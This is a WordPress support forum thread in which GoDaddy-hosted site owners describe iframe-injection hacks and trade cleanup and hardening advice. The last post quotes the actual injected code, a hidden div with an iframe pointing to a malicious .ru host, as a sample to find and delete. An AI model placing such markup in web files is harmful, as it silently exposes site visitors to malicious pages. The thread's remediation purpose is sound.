Forums

WordPress › Support » How-To and Troubleshooting

Exploits and GoDaddy (14 posts)

  1. kendoori
    Member
    Posted 6 months ago #

    Until yesterday I was running 2.3, and experienced several exploits over the past few weeks (the site is hosted at GoDaddy). Several PHP files were compromised in these attacks, and the pattern was that an iframe was appended to the files. I have good backups and was quickly able to replace the infected files in each case, only to find several days later that they were once again hit.

    After reading up on this, I upgraded to 2.7.1 yesterday.

    Today upon login to the admin pages, my on-access AV scanner picked up a references to gumblar.cn/rss and on subsequent logins I was warned of .js files associated with the plug-in embedded-link-with-video plug in having the JS:Redirector-H2 [Trojan].

    Since I was not able to observe any changes to WP files when I examined them with FTP, I suspect that the gumblar reference was somehow just cached in my browser, and I cleared the cache, and seem to be clear. I also deactivated the errant plug in.

    Am curious as to whether others are experiencing the same, and what steps are being take to harden sites (especially on GoDaddy). I've contacted their support, but with no response yet.

  2. whooami
    Member
    Posted 6 months ago #

    If you have been running 2.3.x you were wide open to a whole host of exploits -- the very least of which is a javascript iframe attack. Hopefully, you have done more than upgrade to insure your site is secure.

  3. kendoori
    Member
    Posted 6 months ago #

    Thanks whooami, can you be more specific?

  4. esmi
    Member
    Posted 6 months ago #

    http://codex.wordpress.org/Hardening_WordPress

  5. whooami
    Member
    Posted 6 months ago #

    Here goes the standard reply,

    fix advice:
    http://ocaoimh.ie/2008/06/08/did-your-wordpress-site-get-hacked/
    http://wordpress.org/search/hacked?forums=1

    Make sure that your files on the server are clean. If that means deleting and reuploading, than you ought to do that. Files that you dont replace, should be looked at closely.

    Check for files that dont belong, directories that dont belong. Image files with changed timestamps -- look at those. Its VERY common for there to be scripts on sites that are named in such a way to mask the fact that theyre scripts.

    Be suspicious, when youre looking at things.

    Look at your permissions. Do you have world writable files? Any world-writable directories? Are they necessary?

    You need to check your database. Look for rogue plugins being loaded, look for rogue users (specifically look for a user named wordpress). You will NOT see rogue plugins or rogue users in your wp-admin/ area. You need to check your database.

    Make sure ALL of your plugins are current.

    Make sure your wordpress is current.

    Change your mysql password that wordpress uses (update your wp-config.php with that new password).

    Change any admin level passwords on your blog.

    Look at any other software thats being used on your site. Is it current?

    That's just an outline and not a complete list.

    There's quite a bit to do, but it's all necessary.

  6. GDHosting
    Member
    Posted 6 months ago #

    kendoori,

    I see a lot of great advice here. I also wanted to pipe in and let you know that we can take a look to see if we can identify the source of the issue you're experiencing. If you provide the domain name, I will follow up on the support ticket you submitted.

  7. kendoori
    Member
    Posted 6 months ago #

    GDHosting, I'd prefer to not mention the domain publicly. My GD Support ticket references Incident ID: 6153133

    They just suggested I use a stronger FTP password, which I will do.

  8. GDHosting
    Member
    Posted 6 months ago #

    Thanks for the update. Let me know if I can help in any other way.

  9. kikolani
    Member
    Posted 6 months ago #

    I just had a run in with this exploit over the weekend as well, and wrote about it here: PHP Script Injection Exploit in WordPress 2.7.1. I cover how it was detected and resolved.

    Also, while I'm sure it can happen with other hosts as well, my site is also hosted with GoDaddy.

  10. ryan_accuwebhosting
    Member
    Posted 5 months ago #

    this is a very common issue with Wordpress. Wordpress is mot more secure, and hence you must take some measures to protect your blog:

    1) Always upgrade to the latest version. This reduces a lot of holes..
    2) Upgrade all the plugins to their latest versions.
    3) Use a strong password.
    4) Do not use unknown plugins. Deactivate and remove if you are using..

  11. digitalrenewal
    Member
    Posted 5 months ago #

    i was hit with this one too, pretty bad. as i design sites and build custom themes, many of my clients were hit as well. avast antivirus (free) is really good at picking up this particular virus on your machine and through firefox.

    thanks kikolani, for your post. looks like i dont have to delete entire installs anymore :) phew!

    also, I found 2 plugins that might help to secure wp better.
    Secure WordPress for the basics and User Locker to guard against brute attacks.

    best of luck to everyone, this virus is a pain in the rump.

  12. Laburriniorg
    Member
    Posted 4 months ago #

    The iFrame hack hit me too just one hour ago.
    Me too I'm hosting at GoDaddy at www.sarahburrini.com
    And I'm using Comicpress...

    I just want to know if there's anything I can do even if I:
    1) Did not upgrade to Wordpress 2.8 (still at 2.7.1.)
    2.) Did not backup BEFORE I was hacked (I know, this will teach me)
    BUT
    I know WHEN my site was being hacked which makes me also see which files are infected.

    So, is it of any use to reinstall a new Wordpress version (2.8) plus the Comicpress theme and to exchange all the infected files and upload my database again?

    Please please help! I put so much work in my Webcomics-site *sniff*
    Thanks in advance!!

  13. carrierawks
    Member
    Posted 2 months ago #

    i was hacked by the "Saudi Arabia Hackers" and I am running the latest version of wordpress. What I am wondering is if they broke into my website or my email. I am guessing the backend of my site, because I recieved an email stating that my admin password had been Lost/Changed and now suddenly I cannot recieve my password.

    Maybe there is a major problem with the 2.8.4 version of Wordpress? I am not entirely sure and it's kind of weird to me. And very random. Since my site isn't very popular at all.

  14. vinz77
    Member
    Posted 2 months ago #

    Hello,
    I suffered from the same. I'm copying my M.O. here, which worked.
    I got
    /homepages/4/d134610354/htdocs/moebius77/blog2/wp-includes/default-widgets.php on line 423 as an error on my blog. No way to login or other. So:
    1) re-install all your Wordpress blog, FTP it onto the server again, EXCEPT the WP-Content folder if you want to keep your images and themes.
    2) Now you should be able to login. Go to your dashboard and install plugin "Script Exploiter".
    3) Run the plugin and look for malicious script. In my case, I had this baby:
    <div style="display:none"><iframe src="http://past-another-life.ru:8080/index.php" width=571 height=464 ></iframe></div>
    copied on most of my install.php files, on all the themes (default, etc.), on the plugins and others.
    4) Download the files with the added script, open them with an editor and erase all the garbage.
    5) FTP them back on the server, you should be all right.
    Cheers, hope this helps,
    Vinz

Reply

You must log in to post.

About this Topic

Tags